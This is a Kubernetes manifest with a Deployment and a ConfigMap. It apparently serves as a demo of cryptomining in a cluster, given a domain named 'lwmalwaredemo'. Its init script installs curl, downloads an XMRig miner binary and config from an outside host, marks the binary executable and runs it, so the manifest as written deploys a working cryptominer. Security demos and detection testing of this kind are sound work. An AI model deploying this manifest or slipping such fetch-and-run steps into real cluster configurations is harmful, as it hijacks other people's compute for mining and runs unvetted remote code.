apiVersion: apps/v1
kind: Deployment
metadata:
  creationTimestamp: null
  labels:
    app: crypto-server
  name: crypto-server
spec:
  replicas: 1
  selector:
    matchLabels:
      app: crypto-server
  strategy: {}
  template:
    metadata:
      creationTimestamp: null
      labels:
        app: crypto-server
    spec:
      containers:
      - image: ubuntu:latest
        name: crypto-server
        command: ["/bin/sh"]
        args: ['-c', 'cd /tmp ; cp /init.sh . ; chmod +x init.sh ; ./init.sh' ]
        volumeMounts:
          - mountPath: /init.sh
            name: crypto-server-init-script
            subPath: init.sh
      volumes:
        - name: crypto-server-init-script
          configMap:
            name: crypto-server-init-config
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: crypto-server-init-config
data:
  init.sh: |
    echo "[INFO] Installing curl"
    apt-get update && apt-get install -y curl
    echo "[INFO] Downloading XMRig now"
    curl http://lwmalwaredemo.com/xmrig -o xmrig-demo
    curl http://lwmalwaredemo.com/config.json -o config-demo.json
    chmod +x xmrig-demo
    echo "[INFO] Starting XMRig"
    ./xmrig-demo -c ./config-demo.json
